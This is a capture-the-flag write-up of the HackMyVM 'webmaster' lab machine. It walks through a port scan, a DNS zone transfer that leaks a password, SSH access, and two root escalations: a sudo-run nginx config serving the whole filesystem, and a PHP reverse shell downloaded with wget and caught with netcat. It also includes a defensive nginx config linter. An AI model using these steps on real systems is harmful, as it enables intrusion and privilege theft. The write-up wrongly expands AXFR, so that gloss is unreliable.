
HMV-webmaster

HMV-webmaster machine write-up

Port scan

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.179.226
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-10 10:36 CST
Nmap scan report for 192.168.179.226 (192.168.179.226)
Host is up (0.0013s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6d:7e:d2:d5:d0:45:36:d7:c9:ed:3e:1d:5c:86:fb:e4 (RSA)
| 256 04:9d:9a:de:af:31:33:1c:7c:24:4a:97:38:76:f5:f7 (ECDSA)
|_ 256 b0:8c:ed:ea:13:0f:03:2a:f3:60:8a:c3:ba:68:4a:be (ED25519)
53/tcp open domain Eero device dnsd
| dns-nsid:
|_ bind.version: not currently available
80/tcp open http nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
MAC Address: F2:B2:84:58:6C:F6 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 1 hop
Service Info: OS: Linux; Device: WAP; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.29 ms 192.168.179.226 (192.168.179.226)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.38 seconds

This machine has one more open port than most: 53. That port is normally used for name resolution, so keep it in mind; we may well need to edit the hosts file.

Web enumeration

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.226
<img src="comic.png" alt="comic">
<!--webmaster.hmv-->

Just an image and an HTML comment. Opening the page in a browser revealed nothing else, so on to directory scanning.

┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -u 192.168.179.226 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.179.226
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

Nothing at all.
Given the open DNS service and the comment on the web page, I suspected a virtual host name was needed, so I edited /etc/hosts and tried again, but the result was the same.

┌──(root㉿kakeru)-[~/tmp]
└─# vim /etc/hosts

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.226
<img src="comic.png" alt="comic">
<!--webmaster.hmv-->

┌──(root㉿kakeru)-[~/tmp]
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kakeru.localdomain kakeru
192.168.240.113 dc-2
192.168.179.226 webmaster.hmv webmaster
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

The only DNS tool that came to mind was dig.

└─# dig @192.168.179.226 webmaster.hmv

; <<>> DiG 9.20.4-3-Debian <<>> @192.168.179.226 webmaster.hmv
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38750
;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: f32eda80cb81fb45c347235f67a96b271532378304054959 (good)
;; QUESTION SECTION:
;webmaster.hmv. IN A

;; AUTHORITY SECTION:
webmaster.hmv. 604800 IN SOA ns1.webmaster.hmv. root.webmaster.hmv. 2 604800 86400 2419200 604800

;; Query time: 63 msec
;; SERVER: 192.168.179.226#53(192.168.179.226) (UDP)
;; WHEN: Mon Feb 10 10:57:43 CST 2025
;; MSG SIZE rcvd: 115

┌──(root㉿kakeru)-[~/tmp]
└─# dig 192.168.179.226
;; communications error to 192.168.179.180#53: timed out
;; communications error to 192.168.179.180#53: timed out

; <<>> DiG 9.20.4-3-Debian <<>> 192.168.179.226
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 27766
;; flags: qr aa rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;192.168.179.226. IN A

;; ANSWER SECTION:
192.168.179.226. 0 IN A 192.168.179.226

;; Query time: 15 msec
;; SERVER: 192.168.179.180#53(192.168.179.180) (UDP)
;; WHEN: Mon Feb 10 10:56:55 CST 2025
;; MSG SIZE rcvd: 49

But a plain query resolved nothing; after checking a walkthrough, I used dig axfr.

In dig, AXFR is a query type that requests a DNS zone transfer (Authoritative Xerox File Replication). It retrieves every record of an entire DNS zone from the primary DNS server, and is normally used to back up DNS records or to synchronise data between primary and secondary DNS servers.

Sure enough, this returned information.

┌──(root㉿kakeru)-[~/tmp]
└─# dig axfr @192.168.179.226 webmaster.hmv

; <<>> DiG 9.20.4-3-Debian <<>> axfr @192.168.179.226 webmaster.hmv
; (1 server found)
;; global options: +cmd
webmaster.hmv. 604800 IN SOA ns1.webmaster.hmv. root.webmaster.hmv. 2 604800 86400 2419200 604800
webmaster.hmv. 604800 IN NS ns1.webmaster.hmv.
ftp.webmaster.hmv. 604800 IN CNAME www.webmaster.hmv.
john.webmaster.hmv. 604800 IN TXT "Myhiddenpazzword"
mail.webmaster.hmv. 604800 IN A 192.168.0.12
ns1.webmaster.hmv. 604800 IN A 127.0.0.1
www.webmaster.hmv. 604800 IN A 192.168.0.11
webmaster.hmv. 604800 IN SOA ns1.webmaster.hmv. root.webmaster.hmv. 2 604800 86400 2419200 604800
;; Query time: 59 msec
;; SERVER: 192.168.179.226#53(192.168.179.226) (TCP)
;; WHEN: Mon Feb 10 11:04:54 CST 2025
;; XFR size: 8 records (messages 1, bytes 274)

The record john.webmaster.hmv. 604800 IN TXT "Myhiddenpazzword" is suspicious.
Trying to log in over SSH as john with it works.

┌──(root㉿kakeru)-[~/tmp]
└─# ssh john@192.168.179.226
The authenticity of host '192.168.179.226 (192.168.179.226)' can't be established.
ED25519 key fingerprint is SHA256:Pc29l65Be7facFkvVvZRZLlHBJBvwLH5bOciipZXstQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.179.226' (ED25519) to the list of known hosts.
john@192.168.179.226's password:
Linux webmaster 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Dec 5 05:38:56 2020 from 192.168.1.58
john@webmaster:~$

Privilege escalation

There is a sudo rule for nginx, so I looked up how it can be used to escalate.
I found an article saying that nginx can be pointed at an arbitrary configuration file, so I wrote one modelled on the example config.

john@webmaster:~$ sudo /usr/sbin/nginx -c /home/john/nginx.conf
john@webmaster:~$ cat nginx.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
worker_connections 768;
}
http {
server {
listen 1234;
root /;
autoindex on;
}
}

Then requesting port 1234 over HTTP lets us read any file.

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.226:1234/root/root.txt
HMVnginxpwnd
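Added example, not code from the write-up: a minimal Python linter that flattens an nginx config and flags the directive combination used above (workers as root, document root at /, autoindex on, pid file in /tmp), run against the config from this post and a hardened counterpart, both embedded as constructed samples. The tokenizer is an illustration only and does not handle quoted strings or include directives.

```python
import re

# Constructed samples: the first mirrors the nginx.conf from the write-up above,
# the second is a minimal hardened counterpart for comparison.
PRIVESC_CONF = """
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events { worker_connections 768; }
http { server { listen 1234; root /; autoindex on; } }
"""
HARDENED_CONF = """
user www-data;
pid /run/nginx.pid;
events { worker_connections 768; }
http { server { listen 80; root /var/www/html; autoindex off; } }
"""

def parse_directives(text):
    """Flatten an nginx config into (context, directive, args) tuples."""
    text = re.sub(r'#.*', '', text)          # drop comments
    out, stack = [], []
    for stmt in re.findall(r'[^;{}]+[;{]|}', text):
        stmt = stmt.strip()
        if stmt == '}':
            stack.pop()
            continue
        words, end = stmt[:-1].split(), stmt[-1]
        if not words:
            continue
        if end == '{':
            stack.append(words[0])           # entering a block such as http or server
        else:
            out.append(('/'.join(stack) or 'main', words[0], words[1:]))
    return out

def audit_nginx(text):
    """Flag the settings that turn nginx into a root-owned file server."""
    findings = []
    for ctx, name, args in parse_directives(text):
        arg = args[0] if args else ''
        if name == 'user' and arg == 'root':
            findings.append(f'{ctx}: worker processes run as root')
        elif name == 'root' and arg == '/':
            findings.append(f'{ctx}: document root is the filesystem root')
        elif name == 'autoindex' and arg == 'on':
            findings.append(f'{ctx}: directory listing enabled')
        elif name == 'pid' and arg.startswith('/tmp/'):
            findings.append(f'{ctx}: pid file in world-writable /tmp')
    return findings

if __name__ == '__main__':
    for label, conf in (('privesc', PRIVESC_CONF), ('hardened', HARDENED_CONF)):
        print(label, audit_nginx(conf) or ['no findings'])
```

The config check is only a detective control; the root cause is the sudo rule that lets john choose the -c path, which is equivalent to granting root.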

After finishing, I found a second approach online.
/var/www/html turns out to be writable.

Upload a PHP reverse shell to it.

┌──(root㉿kakeru)-[~/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.179.226 - - [10/Feb/2025 11:36:35] "GET /php-reverse-shell.php HTTP/1.1" 200 -

john@webmaster:/var/www/html$ wget 192.168.179.83/php-reverse-shell.php
--2025-02-09 22:36:35-- http://192.168.179.83/php-reverse-shell.php
Connecting to 192.168.179.83:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5496 (5.4K) [application/octet-stream]
Saving to: ‘php-reverse-shell.php’

php-reverse-shell.php 100%[==============================================>] 5.37K --.-KB/s in 0s

2025-02-09 22:36:35 (26.9 MB/s) - ‘php-reverse-shell.php’ saved [5496/5496]

Requesting that file over the web while listening locally also yields a root shell.

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
Linux webmaster 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64 GNU/Linux
22:38:55 up 1:03, 1 user, load average: 0.00, 0.00, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
john pts/0 192.168.179.83 22:08 47.00s 2.57s 2.57s -bash
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

Summary. What I learned: how dig queries DNS and what dig axfr does (retrieve the records of an entire DNS zone); nginx privilege escalation through sudo, where a modified configuration file gives access to arbitrary files; and finally a general idea: check whether /var/www/html is writable, and if it is, upload a reverse shell.